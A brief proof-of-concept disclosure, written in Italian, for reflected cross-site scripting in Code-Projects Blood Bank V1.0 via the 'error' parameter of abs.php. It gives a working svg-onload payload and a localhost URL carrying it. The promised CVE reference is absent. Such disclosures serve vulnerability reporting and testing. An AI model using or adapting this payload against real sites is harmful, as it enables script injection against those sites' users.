
Proof-of-concept di exploit per cross-site scripting (XSS) riflesso in Code-Projects Blood Bank V1.0 tramite il parametro 'error' in abs.php, con un payload funzionante e riferimento CVE
"><svg/onload=alert(document.domain)>http://localhost/bloodbank/abs.php?error="><svg/onload=alert(document.domain)>